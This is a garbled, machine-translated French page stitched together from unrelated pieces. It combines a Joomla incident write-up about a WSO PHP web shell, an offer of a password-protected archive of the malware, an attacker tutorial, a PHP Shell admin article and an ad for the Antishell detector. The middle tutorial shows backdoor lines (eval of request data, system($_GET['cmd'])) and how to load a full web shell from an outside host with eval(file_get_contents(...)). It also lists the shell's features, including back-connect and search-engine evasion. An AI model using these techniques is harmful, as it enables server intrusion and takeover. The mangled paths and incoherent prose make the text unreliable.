En tant que Hunter de Shell Web d'Antishell Web, vous permet de rechercher des coquillages Web malveillants. Script de shell de RNR malveillant - où les jambes poussent de ce qu'est une coque Web

WSO malveillant trouvé PNR Shell-script /librurseys/simplepie/idn/openidopenid.php (site sur joomla! 3). Sur le ce moment Seulement déterminé par certains antivirus tels que JS / SARS.S61, PHP: décodage-de, trojan.html.agent.vsvbn, php.shell.shell.unclassed.359.Unofficial.

Dans une "belle" (qui est quelqu'un comme), l'une de nos quartiers (http://ladynews.biz), à la suite de la numérisation de votre site, hébergeant un antivirus, a reçu un tel message:

Incontrôlante des fichiers détectés avec un contenu malveillant. Nous vous recommandons vivement de limiter l'accès au compte FTP uniquement que vous utilisez des adresses IP, ainsi que de profiter protection anti-virus Vérifier le compte des virus. Lisez l'article Recommandations de sécurité et la protection contre les piratations pour éviter la réinfection.

Bien sûr, il a été proposé de traiter cette honte, la numérisation de l'antivirus régulier de Clamav, avec un ensemble de bases de données anti-virus par défaut, n'a pas donné de résultat supplémentaire.

Au moment de la création de cette histoire (2015-10-23), ce script de shell viral était absent dans la base de données anti-virus de la plupart des antivirus, notamment Comodo, DROWE, ESET-NOD32, GDATA, Kaspersky, McAfee, Microsoft, Symantec, Trendmicro et etc., qui ont également été confirmés par le scanner Virustotal Online Scanner 2015-10-23. Seuls quelques antivirus ont pu déterminer le script PHP malveillant:

Résultat antivirus Rafraîchir la date AHNLAB-V3 JS / SRAS. S61 20151022 Avast PHP: Decode- de [Trj] 20151023 Nano-Antivirus Troie. HTML. Agent. VSVBN 20151023.

Le même jour, Clamav et Dr.Web ont été informés de la détection d'un script malveillant. Clamav est toujours obstinément silencieux et Dr.Web a répondu à une colis malveillante dans les 24 heures:

Votre demande a été analysée. L'entrée correspondante est ajoutée à la base de données virale Dr.Web et sera disponible à la prochaine mise à jour.

Menace: php.shell.354.

Dr.Web a gardé sa promesse et son script de virus Openidopenid.php est maintenant défini comme php.shell.354, mais de nombreux antivirus tels que Clamav, Comodo, Drweb, ESET-NOD32, GDATA, Kaspersky, McAfee, Microsoft, Symantec, Trendmicro, etc. . p., aucune idée de cela n'a pas (à partir de 2015-10-25).

Ok., Nous avons supprimé le fichier et allons-vous depuis longtemps? D'où vient-il, nous ne pouvons être perdus que pour la suppression. Et après? Nous commençons à mettre toutes sortes de composants SecurityCheck et à tordre les règles de V.HTACCESS interdisant l'accès à tout et à tous pour l'hébergement partagé (aka hébergement virtuel, hébergement partagé) au plus grand nombre de pouvoirs. Pour combien de temps ces mesures sauveront, personne ne le sait.

À propos du sujet de tous les composants SecurityCheck ... Securitycheck est un composant pour Joomla! Et assez bien. Mais un certain "Protection du site antivirus", ce que je vais utiliser certainement quiconque, voici une critique de pratique confirmée sur cette "protection du site antivirus":

Ce composant crée également un fichier pack.tar dans votre / TMP contenant votre configuration.php et tout autre mot de passe trouvé! Être conscient.

Que dans la traduction signifie: "Ce composant crée également sauvegarde Total du site dans /tmp/pack.tar, qui contient configuration.php avec mots de passe de base de données! Soyez prudent »- cela suggère que« la protection du site Web »de ce composant ne sent pas, ce qui devrait également apporter une victime à la pensée de changer les moyens de modifier les annuaires / journaux, / TMP, / cache et interdire l'accès à ceux-ci.

Traverser ce lien peut être entendu que le problème est au moins plus d'un an. Regardez ici, nous comprenons que le masquage du script de sorts n'est pas fabriqué à la base de la base64_encode / gzdeflate, ce qui signifie que quelque part ailleurs doit faire partie de l'appelant / plug-in openidopenid.php et effectuant base64_decode / gzinflate. Donc openidopenid.php n'est que le résultat (aka conséquence), et non la raison pour laquelle la victime se plaint, du serveur, elle a commencé à envoyer du spam à une échelle industrielle à partir du serveur, et la suppression manuelle des fichiers malveillants n'aide pas, après quoi la victime de plus sur Nic-ru hébergeant pour se plaindre personne d'autre. L'hébergement virtuel "Holey" pourrait bien être très bon. Même souvent, les gens d'IMHO travaillent là pour S / N, et non pour l'idée, mais dans certains cas, le problème peut être significativement plus profond.

Ici, par exemple, "Le fichier flash Adobe a détecté un injecteur malveillant d'iframe malveillant. Je pense que ce n'est plus secret que vous puissiez écrire des interfaces pour télécharger des fichiers sur le site et faire de nombreuses choses intéressantes différentes dans la langue ActionScript. V.swf fichiers virus ( Adobe Flash.), comme l'a montré la pratique, peut rester des années inaperçues et être une porte noire sur le site ( aka porte arrière - porte arrière) Par lequel les fichiers comme "openidopenid.php" peuvent être supprimés avant la formation et en vain.

Que faire, comment parmi des milliers de fichiers trouvent "Lien faible"? Pour ce faire, vous devez utiliser la soi-disant analyse hurlique et dans certains cas pour appliquer des bases de données anti-virus de développeurs tiers. Il convient de prendre en compte cette analyse hurlique, selon ses paramètres, peut donner beaucoup de faux positifs que lors de l'utilisation de signatures virales supplémentaires à partir de développeurs tiers.

Où obtenir des bases de données anti-virus des développeurs tiers? Par exemple, des bases de données avec des signatures antivirus à partir de développeurs tiers pour Clamav, vous pouvez prendre gratuitement les adresses: www.securiteinfo.com, malwarepatrol.net, rfxn.com. Comment utiliser ces bases antivirus supplémentaires? Ce sera déjà une autre histoire. Vous pouvez seulement dire que des bases de données anti-virus supplémentaires pour clamav à partir de rfxn.com (projet LMD (Linux Malware détecte)) visent à trouver un malveillant spécifiquement dans des applications Web et donne des résultats plus réussis. RFXN.com déclare également que 78% des menaces dont les impressions sont contenues dans leur base de données ne sont pas définies par plus de 30 antivirus commerciaux et le plus probablement.

Alors ... qu'est-ce qui a terminé l'histoire avec un script malveillant de la coquille de RNR Openidopenid.php?

Il a été décidé de stocker des bases de données antivirus supplémentaires pour clamav à partir de Malwarepatrol.net et rfxn.com, téléchargez une copie de sauvegarde des fichiers de site Oui, numérisez-la localement, voici le résultat de la numérisation:

$ Plamscan / LadyNews.biz / ../ Game_Rus.swf: MBL_647563.UNOfficial Trouvé / ../ FarmFrenzy_PP_RUS.SWF: MBL_647563.Unofficial Trouvé / ../ BeachPartycraze_Rus.swf: MBL_2934225.Unofficial Trouvé / ../ hollydeluxe_rus.swf: MBL_647563.UNOfficial Trouvé / ../ Charger_rus.swf: MBL_647563.UNOfficial Trouvé ------------------------ Virus connus: 4174348 Version du moteur: 0.98.7 Annuaires numérisés: 3772 Fichiers numérisés: 18283 Fichiers infectés: 5 Total Erreurs: 1 Données numérisées: 417.76 MB Données Lire: 533.51 MB (rapport 0,78: 1) Temps: 1039.768 sec (17 m 19 s)

/Liburseys/simplepie/idn/openidopenid.php. Comme les fichiers .swf mentionnés ci-dessus ont été supprimés, mais y a-t-il un problème? Il est toujours difficile de dire, - creuser plus loin ...

De la version déchiffrée du fichier /Liburseys/simplepie/idn/openidopenid.php. (http://pastebin.com/wrlrlg9b), en regardant la constante @define ("wso_version", "2,5"); Il devient clair que c'est un tel produit appelé WSO. Un petit réseau effrayant pour le mot clé WSO, ce sont les résultats:

Le sujet n'a pas longtemps été neuf, eh bien, nous prenons dans les dents Regexxer, nous continuons d'accélérer les fichiers du site et de détecter: répertoire d'ouverture d'erreurs "/ home / utilisateur / bibliothèques / joomla / cache / contrôleur / cache": désactivé

Ouais, voici ce que tu es s.ko où a été saisi! Nous examinons la droite au répertoire, qui ne devrait pas être par défaut \u003d chmod 111 (AKA Effectuer pour le propriétaire / groupe / tout). Ainsi, quelque chose est assis quelque part et se caresse dans les catalogues se cachant même de virus chmodami 111.

Ayant installé pour le catalogue de Chmod 551 et regarda à l'intérieur, il a été découvert /Libururese/joomla/cache/controller/cache/cache/langs.php., la source Qui est attiré ici: http://pastebin.com/jdtwpxjt - catalogue / Bibliothèques / Joomla / Cache / Controller / Cache Nous supprimons.

Excellent, maintenant nous sommes mis à tous les fichiers et catalogues:

# Changement de masse des droits (CHMOD) sur les fichiers du répertoire. / Dirname et sous-jacent Trouver / home / utilisateur / public_html -type f -exec chmod 644 () \\; # Changement de masse des droits (chmod) sur c. / Dirname et sous-jacent Trouver / home / utilisateur / public_html -type d -exec chmod 755 () \\;

Nous répétons une fois de nouveau le test d'antivirus avec des bases supplémentaires de Clamscan /Ladynews.biz, mais aurait tout ce qui est propre.

Répétez la recherche de fichiers Regexxer et essayez de rechercher mots clés Oposidopenid, OpenID ou WSO - et, nous arrivons à la conclusion que P. ZDez s'est avéré être beaucoup plus largement et plus profond:

  • - Ce ne devrait pas être ici, voici sa source: http://pastebin.com/jyeizy9g
  • /administrator/components/com_finder/controls/imagelist.php. - Il ne faut pas être ici, voici sa source: http://pastebin.com/0uqdrmgv
  • /Administrator/Components/com_user/tables/css.php. - Il ne faut pas être ici, voici sa source: http://pastebin.com/8qntsyma
  • /Administrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php. - Il ne faut pas être ici, voici sa source: http://pastebin.com/ctvuzsiz
  • /Components/com_jce/ditor/tiny_mce/plugins/link/img/manager.php. - Il ne faut pas être ici, voici sa source: http://pastebin.com/2nwtncxx
  • /Liburureses/joomla/Application/web/Router/HELSITES.PHP. - Il ne faut pas être ici, voici sa source: http://pastebin.com/anhxyvl9
  • /Plugins/system/ytshortcodes/xml.php. - Il ne faut pas être ici, voici sa source: http://pastebin.com/gnmsdfc9
  • /Templates/index.php - Il ne faut pas être ici, voici sa source: http://pastebin.com/ghbmef2T

/Administrator/components/com_admin/index.php. et / /templates/index.php étaient probablement les scripts d'entrée dans lesquels le code principal a été effectué à l'aide de la fonction EVAL () qui n'a pas été recommandé d'utiliser où il a également été utilisé:

Eh bien, la logique de masquage du code malveillant est claire. Maintenant, si nous recherchons la conception "Eval ($", nous trouverons beaucoup de choses intéressantes:

  • /Administrator/components/com_admin/sql/updates/postgresql/php.php. - http://pastebin.com/grhvxt5u
  • /Components/com_kunena/template/blue_eagle/media/iconsets/buttons/bluebird/newsfeed.php. -
  • /Components/com_mailto/helpers/index.php. -
  • /Components/com_users/views/login/file.php. -
  • /Components/com_users/controller.php. - infecté et nécessite un remplacement!
  • /includes/index.php -
  • /Libursees/joomla/string/wrapper/section.php. -
  • /Libreurs/legcy/access/directory.php. -
  • /Libururesys/nextend/javascript/jquery/inputfilter.php. -
  • /Libreurs/nextend/smartslider/admin/views/sliders_slider/tpl/config_tinybrowser.php. -
  • /Liburseys/xef/assets/less/admin.frontpage.php. -
  • /media/diors/codemirror/mode/rust/alias.php. -
  • /Modules/mod_kunenalates/language/zhh-tw/smtp.php. -
  • /Modules/mod_kunenalogin/language/de-de/xul.php. -
  • /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediapplayer/skins/bekle/credits.php. -
  • /Templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php. -

Tous les autres scripts de virus RNP ne sont pas affichés sur Pastebin.com pendant 24 heures seulement 10 publications sont autorisées. En général, l'ordre de suppression est approximativement suivant:

Oui, j'ai presque oublié, - avant de commencer à éliminer les scripts malveillants, il n'empêchera pas d'ajouter V.HTACCESS Plusieurs règles interdisent un accès direct aux fichiers N'importe quel.php dans tous les répertoires, mais permettant aux fichiers racines uniquement / ou /index.php et / administrateur / ou /aadministrator/index.php - cela pars dans l'accédant à l'attaquant opposé aux scripts de sorts entrants cachés dans divers répertoires système:

UPD 2015-10-28: Eh bien, quoi? Avez-vous déjà détendu? Il est trop tôt...

Maintenant regarder toujours dans le domaine des fichiers de site fichiers binairesqui dans le moteur ne devrait pas être en maman:

trouver / MyPath / -executable -Type F TROUVE / MYPATH / -TYPE F -PERM -U + X Recherche / MyPath / -Type F | Fichier Xargs | Grep "\\: \\ * données $"

Qui recherchent - il trouvera toujours (fichiers binaires):

  • /MODULES/MOD_P30Life_Expectrogique_calc/tmpl/accordian.pack.js.
  • /Images/stories/AUDIO/34061012-B1BE419AF0B9.mp3
  • /Liburseys/xef/Sources/folder/navigation.php.
  • /Liburseys/joomla/Application/web/Application.php.
  • /Libreurs/joomla/document/json/admin.checkin.php.
  • /Libreurs/nextend/assets/css/licensens.php.
  • /Libursees/fof/config/domain/toolbar.catégories.html.php.
  • /Libreurs/foff/form/field/Client.php.
  • /Liburseys/pheputf8/sysinfo_system.php.
  • /Components/com_mobilejoomla/index.php.
  • /Components/com_mobilejoomla/sysinfo_system.php.
  • /Components/index.php.
  • /Components/com_banner/sysinfo_config.php.
  • /Components/com_kunena/views/home/admin.checkin.php.
  • /Components/com_jce/editor/tiny_mce/plugins/source/js/codemirror/toolbar.checkin.php.
  • /ComPonents/com_jce/plugins/colorpicker/admin.cache.php.

Qui convient

D'où viennent les jambes de cette infection, il n'était pas possible de déterminer de manière fiable si la vulnérabilité critique a récemment été trouvée dans le moteur vous permettant d'effectuer des injections SQL et d'accroître les privilèges, que ce soit mentionné ci-dessus comme des fichiers .swf malveillants ou toujours Non encore détecté - Vulnérabilité de l'un des composants ou plug-ins tiers, ou un hébergement Web virtuel trous, - la question reste ouverte?

Actuellement, les fichiers malveillants détectés sont nettoyés, les fichiers du moteur sont entièrement rechargés, les barricades sont construites par des règles de v.htaccess ... Qui a le temps et qui souhaite collecter ce groupe de merde, vous pouvez télécharger le WSO-PHP. -Shell-in-joomla.zip - Tous les fichiers RNR malveillants mentionnés ci-dessus, mot de passe de l'archive: www.sype

Total: la parabanie n'arrive pas beaucoup, et tout antivirus gratuit ou commercial avec ses heuristiques, ainsi que des bases de signature supplémentaires, pas une panacée. Par conséquent, tous les anti-virus sont un outil obsolète permettant de protéger un environnement multijoueur actif et de prévenir diverses menaces inconnues, ce sont des méthodes de protection pararanoïde, par exemple: virtualisation, SELINUX, BASTIVE LINUX, BIT immuable, EcryptFS, etc.!

  • Menace: coquille Web PHP WSO
  • Victime: Ladynews.biz

Pas cet article, mais beaucoup seront utiles. Nous avons donc pénétré sur le panneau d'administration, nous avons éventuellement pu fumer un tel code quelque part, par exemple:

si (Isset (demande $ _ "[" E "])) eval (Stripslashes ($ _ Demande [" E "]));


ou simplement:

affirmer (Stripslashes (Demande $ _));


stripslashes dans ce cas, exclusivement pour contourner Magic_Quotes \u003d sur
Beaucoup sont insérés

système ($ _ obtenir ["cmd"])

Et d'autres déshérables, mais tout est trop, en fait, tout est plus facile. Ainsi, vous avez inséré ce code quelque part (dans FAQ.PHP, ou vous avez déjà simplement taper un tel BeFdor quelque part dans les profondeurs des scripts de serveur).
Ceux. En conséquence, vous avez par exemple obtenu la santé de ce lien:

http: //localhost/user.php? e \u003d phpinfo ();


Et après cela, beaucoup de stupeurs débutants. Immédiatement la prochaine question - que faire ensuite?
Et jetons un coup d'œil à ce phpinfo que nous avons lancé, les deux points principaux que nous serons intéressés par cette situation:

allow_url_fopen.
autoriser_url_include.

autoriser_url_include.

Oui, TIN, bien sûr, mais en règle générale.

Restes

Et il, en règle générale \u003d sur. Comment pouvons-nous utiliser cette opportunité, laissée imprudemment laissée par l'administrateur, afin de ne pas vous baigner surtout (de ne pas rechercher des dossiers disponibles sur l'enregistrement et le non-sens comme pour découvrir et ne pas remplir la coquille du tout, mais j'aime grimper sur le serveur). Oui, très simple. Si un

allow_url_fopen \u003d on.

Et vous avez un code qui supprime au moins compte que vous avez déjà lu toutes les configs, fusionné tout ce dont vous avez besoin, etc. (Ne confondez pas avec "personnalisé", seulement que puis-je lire)

Prenez la dernière coquille de l'entretien des profondeurs orbe., Supprimez la première ligne:

+
nous enlevons ce dernier
+
vous pouvez supprimer le mot de passe, la coque ne remplit pas, il suffit d'utiliser, de ne pas partir

conserver à n'importe quel hôte comme bla_bla.txt (Le même Narod.ru est tout à fait approprié) ou sous la forme d'une image sur un service de partage de fichiers fournissant des liens directs vers le contenu du contenu et apportez une telle demande:
Le code:

http: //localhost/user.php? a \u003d eval (fichier_get_contents ("http://site.ru/bla_bla.txt"));


Tout. Vous avez une coquille complète sans influence physique sur le serveur avec toutes les possibilités habituelles de Shell. Merci pour l'attention
PS: Testé sur WSO2.4 ( wso2_pack.php.)

Description du shell:
Autorisation
Informations sur le serveur
Gestionnaire de fichiers (copier, renommer, déplacer, supprimer, chmod, toucher, créer des fichiers et des dossiers)
View, heexview, édition, Davnotad, fichier Appad
Travailler avec des archives zip (emballage, déballage)
Console
SQL Manager (MySQL, PostgreSQL)
Exécution de code PHP
Travailler avec des lignes + recherche hesha dans des bases en ligne
Bindport et Beck Connect (Perl)
Rechercher du texte dans les fichiers
* NIX / Windows
Des chips
Antipoikovik (Agent utilisateur vérifié si le moteur de recherche renvoie ensuite 404 erreurs)
La console se souvient des commandes entrées. (Vous pouvez les naviguer avec les flèches ascendantes, en bas lorsque vous concentrez sur le champ de saisie)
Vous pouvez utiliser AJAX
Faible poids (24,32 KB)
Sélectionnez le codage dans lequel le shell fonctionne.

Cet utilitaire fournit une interface Web pour des travaux à distance avec le système d'exploitation et ses services / démons.
L'utilisation de ce produit est sur des objectifs illégaux face à la responsabilité pénale.

L'archive contient la dernière version de Shell et une petite boîte à outils WSOMOMERAGER - pour travailler avec des coquillages.

Télécharger Shell:

Récemment, sur l'immense étendue d'Internet, je suis tombé sur la mention de " PHP Shell"Il y a quelques années, cet utilitaire m'a beaucoup aidé et je veux maintenant donner une sorte de devoir à son développeur Martin Geisler (http://mgeisler.net/).

Quel est le but "shell php"? Je crois que chaque programmeur Web «avancé», sans parler de Sysadmina, est tombé sur SSH et utilisé. SSH nous permet d'obtenir un accès à distance au serveur et d'effectuer une commande shell sur celle-ci (bien, il existe toutes sortes de commandes telles que marcher sur les catalogues, en haut, déplacez, supprimez et copiez des fichiers, exécuter des scénarios et votre utilitaire de sortie. ), comme si le fil sur votre moniteur de l'unité système allongé à des tailles incroyables et atteint déjà, sur le serveur hôte. Je dois dire que c'est possible à travers le SSH de tunneling et de x-graphiques, une image de bureau, montrant des applications de fenêtre en cours d'exécution, mais il n'est clairement pas pour les serveurs Web.

En bref, si vous n'avez pas de SSH sur l'hébergement, alors "Qu'est-ce qui ne va pas dans le royaume danois." Le moins est, souvent le SSH par défaut sur votre site "frais" est désactivé et il faut un certain temps pour vous calmer avec le service de support afin que SSH ait gagné. C'est exactement ce qui s'est passé dans cette soirée d'hiver lointain. J'avais besoin de transférer de toute urgence le site d'une machine à une autre, pendant quels problèmes se posaient, et j'avais l'habitude d'atteindre l'étiquette de mastic sur le bureau, de sorte qu'il existe un "intérieur" chez le patient. Oups ... et la prise en charge de SSH n'est pas activée. Comment être? Si vous êtes assez tenté en programmation sur une langue là-bas, il ne sera pas difficile d'écrire un petit script qui implémente la tâche nécessaire. J'ouvre Google et courir autour de la paire de liens, j'ai trouvé une mention de shell php. En un mot, je suis rentré chez moi à l'heure.

En vérité, j'ai eu beaucoup de chance que nous en avions assez de ces possibilités de découpage pour travailler avec Shell, ce qui m'a fourni avec PHP Shell - toujours son imitation.

Au cœur de sa coquille PHP utilise la fonction PHP - proc_open. Cette fonctionnalité commence une commande et ouvre des flux de sortie d'entrée pour saisir certaines informations dans une application (imitant l'entrée manuelle telle qu'elle figurait sur le clavier) et affiche les résultats du travail (si vous savez quels pipes sont alors en parlons d'eux) . En fait, la fonction PROC_OPEN est une version améliorée et augmentée d'EXED ou de fonctionnalités système. Ceux-ci, la vérité n'a lancé que le programme et ne vous permettait pas d'interagir avec elle, vous devriez avoir immédiatement dans les paramètres de la ligne de commande afin de spécifier toutes les données de l'opération dont vous avez besoin. Proc_OPEN vous permet de créer des tuyaux associés à votre PHP Skipte et vous pouvez correspondre à l'entrée de données dans le programme et à lire les résultats de son fonctionnement. Pour les amateurs d'hébergements libres, je dirai immédiatement:

"Non, avec PHP Shell, vous ne pourrez pas accéder à SSH."

Le fait est que, pour l'hébergement d'hébergement gratuit ou très bon marché, vous devez exécuter PHP en mode Safe_Mode. Il handicapé un certain nombre de fonctions, y compris proc_open.

"Non, avec phpshell, vous ne pourrez pas travailler avec des programmes interactifs."

L'essence du Web nous dit qu'il n'est pas possible d'exécuter un certain programme qui a continué de travailler sur un serveur distant, ce qui continuerait à travailler et à nous permettre d'entrer et de sortir des données pour plusieurs demandes HTTP distinctes.

"Non, vous ne pouvez pas accéder à tous les programmes, fichiers et dossiers sur le serveur."

Le script fonctionne soit au nom d'Apache, puis ses capacités ne sont limitées qu'aux droits de rendre le compte Apache. Soit comme une option si SUEXEC est utilisé sur l'hébergement (http://fr.wikipedia.org/wiki/suexec), vos droits coïncident avec le compte du compte de laquelle le script php est en cours d'exécution.

Supposons que cela ne vous a pas empêché et que vous avez téléchargé et déballé les archives sur votre serveur dans le dossier, dites, phpshell. Si vous entrez dans la barre d'adresse du navigateur "en quelque sorte-appelée-ton site web / phpshell / phpshel.php", il vous sera demandé de vous présenter, entrez le nom et le mot de passe - bien sûr, ce n'est pas les informations d'identification que vous avez reçues de votre hébergement

Vous devez donc configurer les droits d'accès: qui peut accéder à Shell via cet utilitaire. Pour ce faire, dans le fichier config.php, recherchez la section Utilisateurs et ajoutez-y un nom d'utilisateur et un mot de passe comme suit:

Vasyano \u003d secret.

Si vous êtes confus par le fait que le mot de passe est défini sur le formulaire ouvert, utilisez le fichier PWHASH.PHP, vous pouvez trouver le mot de passe MD5 et dans le fichier CONFIG.PHP, il sera stocké.

Maintenant, nous faisons une entrée rentrant et entrez dans la fenêtre, où nous entrons dans le bas de la fenêtre, cliquez sur "Exécuter", puis le résultat de son exécution est affiché au centre de la fenêtre de la page.

Sur cela, tout, peut-être que phpshell vous aident à vous aider.

La plupart des attaques sur les ressources corporatives impliquent l'introduction de coques Web - code permettant de gérer les machines touchées de l'extérieur du réseau. L'Antishell Web Shell Hunter est un agent de protection qui comprend un ensemble complet de mécanismes permettant d'identifier des coquilles Web.




Web Shell est un script chargé sur le serveur et sert à une administration à distance. Cela ne devient malicieux que lorsqu'ils contrôlent l'attaquant. Et dans ce cas, il représente une menace sérieuse.

Le serveur infecté ne doit pas être connecté à Internet - il peut être situé dans le réseau interne de la société. Ensuite, la coque Web est utilisée pour accéder à d'autres hôtes avec des applications ou des informations critiques.

Pour écrire des coquilles Web, toute langue prise en charge par le serveur Web cible est appliquée. En pratique, PHP et ASP sont le plus souvent utilisés, car ils sont les plus populaires. Répartir également des programmes malveillants sur Perl, Ruby, Python et Shell Unix.

Les coquillages Web sont installés assez standard pour les applications malveillantes dans la méthode - en utilisant des vulnérabilités dans le logiciel CMS ou Web Server. Après cela, ils fonctionnent comme un porte-retour, ce qui permet à un attaquant d'effectuer des commandes arbitraires sur une machine distante, y compris pour introduire un logiciel extoralable ou commencer à des attaques vers d'autres serveurs.

Le danger particulier des coquilles Web est leur simplicité relative. La modification du script, qui entraîne un autre programme, est la tâche avec laquelle même un débutant peut faire face. En raison de cette qualité, la détection de coque Web avec des installations antivirus standard est difficile.

Comme d'autres programmes malveillants, les coquillages Web peuvent être identifiés pour un certain nombre de signes externes. Cependant, une partie importante d'entre elles peut également être liée à des fichiers complètement légaux, de sorte que tous les indicateurs suspects doivent être pris en compte dans le complexe, analyser toute la photo, et non ses fragments.

Les indicateurs possibles de la présence de coque Web sur le serveur peuvent être:

  • périodes de charge anormalement élevée sur le serveur;
  • la présence de fichiers avec un horodatage suspect (par exemple, plus tard que l'heure de la dernière mise à jour logicielle);
  • disponibilité de fichiers suspects dans des endroits disponibles sur Internet;
  • la présence de fichiers dans lesquels il y a des références à cmd.exe, en eval et similaires;
  • disponibilité de l'autorisation suspecte du réseau interne;
  • la présence de fichiers qui génèrent le trafic discrètement par eux.

Évidemment, une analyse "manuelle" dans ce cas, si possible, elle nécessite trop de ressources humaines. Son utilisation est donc privée de toute faisabilité pratique. Antishell Web Shell Hunter, développé par Garhi Technology, vous permet d'automatiser cette procédure et ses développeurs font valoir qu'il est garanti de reconnaître toutes les coquilles Web connues.

L'application est basée sur les technologies suivantes:

  • recherche par mots-clés. Tous les fichiers sont vérifiés pour les mots et les commandes pouvant être associées à une attaque;
  • analyse du signal: recherchez des signatures de coquilles Web bien connues;
  • analyse des lignes les plus longues. Souvent, le code malveillant est crypté de manière à contourner la recherche par mots-clés. Cela rend les rangées de code particulièrement longues, ce qui leur permet de les détecter;
  • calcul de l'entropie Shannon dans le code source. Chaque ligne du code est attribuée à une note, sur la base de laquelle on peut juger du degré de menace;
  • recherche de code malveillant par la méthode d'index de coïncidence.

Cela résout l'un des principaux problèmes de détection de coques Web associés à une variété de langues utilisées et la possibilité d'une modification simple. Au travail d'Antishell Web Shell Hunter, ces facteurs n'affectent nulle part, ce qui le rend universel et vous permet d'utiliser pour protéger n'importe quel serveur.

Étant donné que les fichiers qui n'ont pas été modifiés après l'exclusion de la numérisation précédente du traitement, l'Antishell Web Shell Hunter ne crée pas une charge élevée sur le serveur. De plus, cette approche réduit le temps de vérification.

Dans le même temps, les administrateurs peuvent définir de manière indépendante l'heure de contrôle, en fonction des fluctuations de charge quotidiennes sur le serveur. Si nécessaire, le mode quotidien est remplacé par une hebdomadaire ou même mensuelle, ce qui vous permet d'optimiser le fonctionnement de l'ensemble du système.

Le programme détecte les fichiers contenant le code Web-shell et fournit l'administrateur système avec des informations complètes sur l'objet: date et heure de la création, nom du propriétaire, droit et ainsi de suite.

Toutes ces données (mais pas les fichiers eux-mêmes) entrent également dans le centre client du développeur client, qui, sur leur base, peut fournir un soutien au traitement de l'incident et à l'étude de ses conséquences. Les clients signés par le service payant peuvent également utiliser l'utilitaire spécial pour télécharger eux-mêmes des fichiers infectés pour une analyse plus approfondie.

Les messages sur les objets trouvés sont envoyés à l'administrateur système par courrier électronique. Il n'a pas besoin de suivre personnellement le processus.

À ce jour, l'Antishell Web Shell Hunter est le seul outil axé sur la détection de coquillages Web. Un certain nombre d'applications antivirus incluent une fonction similaire, mais uniquement sous la forme d'une option supplémentaire, qui est inactive par défaut. En règle générale, ils sont basés uniquement sur une analyse d'alarme, leur efficacité laisse donc beaucoup à désirer.

Étant donné que l'utilisation de coquilles Web pour les attaques de serveurs devient de plus en plus courante, il est logique de protéger le système à l'aide d'une solution spécialisée. Comme on dit, la sécurité n'est jamais trop.